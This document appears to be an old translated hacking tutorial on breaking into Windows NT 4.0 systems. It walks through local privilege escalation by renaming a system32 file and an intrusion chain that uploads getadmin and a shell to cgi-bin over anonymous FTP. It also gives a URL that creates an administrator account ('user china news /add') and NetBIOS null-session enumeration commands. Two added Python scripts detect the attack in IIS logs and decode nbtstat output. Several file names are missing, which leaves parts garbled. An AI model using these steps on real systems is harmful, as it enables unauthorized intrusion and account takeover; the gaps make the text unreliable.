If you have an ordinary user account, there is a very simple way to get the NT Administrator account:
First, under c:\winnt\system32, change the name to a backup name
Then change the name to
Then restart.
It is a program loaded at startup. After the restart, the usual logon password prompt does not appear; instead User Manager comes up,
and at that point you have the authority to add yourself to the Administrators group.
Don't forget to change the file name back afterwards! Note that this only works if your account is allowed to rename files in c:\winnt\system32; on an install where that directory's permissions have been tightened it fails.
Two:
The following technique is aimed at sites that do not take NT network security seriously;
some of the HTTP tricks in it may also be useful to more advanced readers.
You can take the following steps to get into an NT network:
NT's IIS FTP server generally allows anonymous logins, and some anonymous accounts even have upload permission, so those are the sites we attack. If anonymous logins are not allowed, real users must log in with their own passwords, and because FTP sends passwords in clear text they can be intercepted with a sniffer such as the tcpspy tool. I won't go into those more advanced techniques here.
It is precisely the setting that allows anonymous FTP login that gives us the opportunity to break into the NT server. We log in to an NT server with ftp, for example (example name):
ftp
Connected to
ntsvr2 exposes its NetBIOS name. Because IIS is running, there must also be an IUSR_ntsvr2 account (IIS creates IUSR_<machinename> to run anonymous web requests), which belongs to the Domain Users group. This is the account we will later use to obtain Administrator rights.
User: anonymous
Password: enter guest@ or guest
Many administrators who lack network security knowledge neither disable the Guest account nor set a password on it, so Guest is a valid, usable account, even though it only belongs to the Domain Guests group.
In that case we can get into the NT server's ftp.
Once in, list the directory and try key directories such as cd /c or cd /wwwroot. If you are lucky and the change of directory succeeds, you are about 80% of the way there.
Now look for the cgi-bin directory (or the scripts directory). After entering it,
copy the file from winnt into cgi-bin, and upload getadmin to cgi-bin as well.
Then request: /cgi-bin/?IUSR_SATURN
(the argument is the target's own IUSR_ account name, so for ntsvr2 it would be IUSR_ntsvr2).
After about ten seconds the screen will show:
CGI Error
At this point there is a 90% chance that IUSR_ntsvr2 has been promoted to Administrator, which means every anonymous visitor to the web site now runs as an administrator. Note that getadmin only works on NT 4.0 systems that lack the post-SP3 getadmin hotfix (included in SP4); on a patched server it has no effect.
You can now add a user:
/cgi-bin/?/c c:\winnt\system32\ user china news /add
This creates a user called china with the password news. Then:
/cgi-bin/?china
or
/scripts/tools/?china
Now you can log in with the china account and have full Administrator rights. You can also use the method above to modify things directly; if the tool is not there, upload it to scripts/tools or cgi-bin yourself. The whole chain depends on one misconfiguration: anonymous FTP write access to a directory that the web server marks as executable, so anything uploaded there can be run over HTTP as IUSR_<machinename>.
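As an added example (not part of the original text), here is how a defender would spot this chain in the IIS W3C extended log: requests into the Execute-enabled directories whose query string carries a getadmin-style IUSR_ argument or an interpreter's "/c ... user <name> <pw> /add". The log lines are constructed for this example; they assume the default #Fields layout with cs-uri-query enabled, that the uploaded interpreter was cmd.exe and the account tool net.exe (the original text leaves those names out), and that getadmin was uploaded as getadmin.exe.

```python
"""Scan IIS W3C Extended log lines for the two request shapes the attack above
produces: a privilege-escalation tool run from an executable directory, and a
command interpreter run with "/c ... user <name> <pw> /add".
Sample log lines are constructed for this example."""
import re
from urllib.parse import unquote_plus

# Directories that IIS 4 marks Execute by default (assumption: site uses the defaults).
EXEC_DIRS = ("/cgi-bin/", "/scripts/")

# Query-string shapes from the attack: an interpreter's "/c", a
# "user <name> <pw> /add" account creation, or an IUSR_<host> argument.
QUERY_RULES = [
    ("cmd_switch", re.compile(r"(^|\s)/c(\s|$)", re.I)),
    ("user_add",   re.compile(r"\buser\s+\S+\s+\S+\s+/add\b", re.I)),
    ("iusr_arg",   re.compile(r"\bIUSR_\w+", re.I)),
]
# The tool the text names plus the interpreter the constructed sample assumes.
SUSPECT_EXE = {"getadmin.exe", "cmd.exe"}


def parse_w3c(lines):
    """Yield one dict per record, taking column names from the #Fields directive."""
    fields = None
    for line in lines:
        line = line.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue          # malformed record; skip rather than misalign columns
        yield dict(zip(fields, parts))


def classify(rec):
    """Return the rule names that fire for one record (empty list = clean)."""
    stem = rec.get("cs-uri-stem", "").lower()
    query = rec.get("cs-uri-query", "-")
    query = "" if query == "-" else unquote_plus(query)   # "-" means no query
    hits = []
    if stem.startswith(EXEC_DIRS):
        name = stem.rsplit("/", 1)[-1]
        if name in SUSPECT_EXE:
            hits.append("suspect_exe")
        for rule, pat in QUERY_RULES:
            if pat.search(query):
                hits.append(rule)
    return hits


def scan(lines):
    """Return (client_ip, stem, decoded query, hits) for every record that fires."""
    out = []
    for rec in parse_w3c(lines):
        hits = classify(rec)
        if hits:
            q = rec.get("cs-uri-query", "-")
            out.append((rec["c-ip"], rec["cs-uri-stem"],
                        "" if q == "-" else unquote_plus(q), hits))
    return out


# Constructed sample: one benign page hit, the getadmin call, the net user call,
# and a stock IIS 4 tool that should not fire.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Server 4.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
1999-03-01 10:01:12 10.0.0.5 GET /default.htm - 200
1999-03-01 10:02:40 10.0.0.9 GET /cgi-bin/getadmin.exe IUSR_NTSVR2 502
1999-03-01 10:03:05 10.0.0.9 GET /cgi-bin/cmd.exe /c+c:\\winnt\\system32\\net.exe+user+china+news+/add 200
1999-03-01 10:04:19 10.0.0.7 GET /scripts/tools/getdrvrs.exe - 200
"""

if __name__ == "__main__":
    for ip, stem, query, hits in scan(SAMPLE_LOG.splitlines()):
        print(f"{ip} {stem} {query!r} -> {', '.join(hits)}")
```

The query string is URL-decoded before matching so that the "+"-separated arguments IIS logs are seen as the command line the attacker typed; the stock /scripts/tools/ entry shows the rules key on the request content rather than on the directory alone.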
Third:
Scanning with NT's NetBIOS:
nbtstat -a ntsvr2
or
nbtstat -A 111.111.111.111
(-a takes the NetBIOS name, -A the IP address.) This returns the machine's NetBIOS name table: its computer name, the domain or workgroup it belongs to, whether the server service is running, and the name of the logged-on user.
net view \\111.111.111.111
lists the names of the shared resources on that machine. If its C drive is shared,
net use f: \\111.111.111.111\c
maps that C drive to f:.
net use \\111.111.111.111\ipc$ "" /user:""
opens a null session (an anonymous connection to the IPC$ share) with an empty user name and password; once it is established, net view and similar enumeration commands are answered without any credentials, unless the server has RestrictAnonymous set (available from NT 4.0 SP3).
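The nbtstat name table is easier to use when the <xx> suffixes are decoded. As an added example (not code from the original text), this script parses a constructed nbtstat -A name table for the page's example host ntsvr2 and reports the computer name, domain, server service, domain-controller role, IIS presence and logged-on user. The domain name CORPDOM, the MAC address and the rows themselves are made up for the sample.

```python
"""Decode the NetBIOS name table printed by `nbtstat -A <ip>` / `nbtstat -a <name>`
so the interesting facts (computer name, domain, server service, who is logged on)
can be read off mechanically. The sample output is constructed for this example."""
import re

# Meaning of the 16th byte (the <xx> suffix) of a NetBIOS name.
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "workstation service (computer name)",
    ("00", "GROUP"):  "domain or workgroup",
    ("03", "UNIQUE"): "messenger service (computer name or logged-on user)",
    ("20", "UNIQUE"): "server service (file/print sharing)",
    ("1B", "UNIQUE"): "domain master browser (PDC)",
    ("1C", "GROUP"):  "domain controllers",
    ("1D", "UNIQUE"): "master browser",
    ("1E", "GROUP"):  "browser service elections",
}

# One table row: name (padded to 15 chars, sometimes with dots), <suffix>, type, status.
ROW = re.compile(r"^\s*(.{1,15}?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)")
MAC = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f-]{17})")


def parse_name_table(text):
    """Return ([(name, suffix, kind, status), ...], mac) from nbtstat output."""
    rows, mac = [], None
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            name = m.group(1).strip().rstrip(".")   # drop the dot padding
            rows.append((name, m.group(2).upper(), m.group(3), m.group(4)))
            continue
        m = MAC.search(line)
        if m:
            mac = m.group(1).upper()
    return rows, mac


def summarize(text):
    """Reduce the name table to the facts an attacker (or auditor) reads off it."""
    rows, mac = parse_name_table(text)
    info = {"computer": None, "domain": None, "file_sharing": False,
            "domain_controller": False, "pdc": False, "iis": False,
            "logged_on_users": [], "mac": mac}
    for name, suffix, kind, _status in rows:
        if name == "INet~Services" or name.startswith("IS~"):
            info["iis"] = True                 # names IIS registers
        elif suffix == "00" and kind == "UNIQUE":
            info["computer"] = name            # workstation service
        elif suffix == "00" and kind == "GROUP":
            info["domain"] = name              # domain or workgroup
        elif suffix == "20" and kind == "UNIQUE":
            info["file_sharing"] = True        # server service: shares reachable
        elif suffix == "1C" and kind == "GROUP":
            info["domain_controller"] = True
        elif suffix == "1B" and kind == "UNIQUE":
            info["pdc"] = True                 # domain master browser
    # Messenger (<03>) names other than the computer's own are logged-on users.
    info["logged_on_users"] = [n for n, s, k, _ in rows
                               if s == "03" and k == "UNIQUE" and n != info["computer"]]
    return info


def describe(text):
    """Human-readable line per row, with the suffix meaning where known."""
    rows, _ = parse_name_table(text)
    return [f"{n:<15} <{s}> {k:<6} {SUFFIX_MEANING.get((s, k), 'other')}"
            for n, s, k, _ in rows]


# Constructed sample for the page's example host ntsvr2 (domain and MAC are made up).
SAMPLE_NBTSTAT = """\
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
NTSVR2         <00>  UNIQUE      Registered
NTSVR2         <20>  UNIQUE      Registered
CORPDOM        <00>  GROUP       Registered
CORPDOM        <1C>  GROUP       Registered
CORPDOM        <1B>  UNIQUE      Registered
NTSVR2         <03>  UNIQUE      Registered
ADMINISTRATOR  <03>  UNIQUE      Registered
INet~Services  <1C>  GROUP       Registered
IS~NTSVR2......<00>  UNIQUE      Registered

MAC Address = 00-50-56-AB-CD-EF
"""

if __name__ == "__main__":
    print("\n".join(describe(SAMPLE_NBTSTAT)))
    print(summarize(SAMPLE_NBTSTAT))
```

A <20> entry is what tells you net view and net use have something to talk to; a <03> name that differs from the computer name is the interactive user, which is why nbtstat alone, with no credentials, already leaks who is sitting at the box.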
Chapter 4: Tools ported from Unix:
Windows 95/98 users can use this tcp/ip tool to capture packets on a tcp/ip connection:
You must also download this library before using it.
Windows NT user version